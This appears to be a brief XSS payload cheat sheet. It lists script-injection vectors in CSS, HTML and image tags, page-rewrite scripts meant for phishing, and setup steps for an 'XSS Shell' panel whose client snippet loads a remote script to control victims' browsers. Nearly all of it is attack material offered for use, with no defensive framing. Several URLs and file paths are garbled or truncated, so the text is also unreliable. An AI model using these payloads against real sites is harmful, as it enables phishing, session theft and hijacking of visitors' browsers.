Document description:

CSS
body{background:url(javascript:alert('XSS'))}
@import "http://www.guets m/xss.css";

HTML
<div style="width:0;height:0;background:url(javascript:document.onload=function(){alert('XSS');});"></div>
<DIV style="Sec:expression_r(alert(/XSS/));">
<TABLE BACKGROUND="javascript:alert('XSS')">
<INPUT onkeyup="alert('XSS');">
<link rel="stylesheet" type="text/css" href="http://www.guet om/xs "></link>

IMAGE
<img src="javascript:alert(/XSS/)"/>
<img src="" onerror=alert("XSS")>
<img src="#" style="Sec:expression_r(alert(/XSS/));">
<img onmouseover="alert('XSS')">
<iframe src=http://w etsec.com/ width=0 height=0></iframe>

Page rewrite:
<script> window.onload=function Rewrite(){ document.open(); document.clear(); document.write("Attack"); document.close(); } </script>

Page rewrite (delayed):
<script> function Phish(){ info="重写 HTML 代码"; document.write(info); } function doit(){ setTimeout("Phish()", 1000); } doit() </script>

XSS Shell: http://la rtcul/application/xssshell/
Admin-side configuration (the admin folder, the db folder, and xssshel):
1. Change the db\she b file name.
2. In admin\d, change the database path in Const DBPATH and the password in Trim(Pass).
3. Change the SERVER domain in xssshell.asp.
4. Open admin\defaul to manage.
Client-side code: <script src="http://域名/xssshe p?v=336699"></script>
获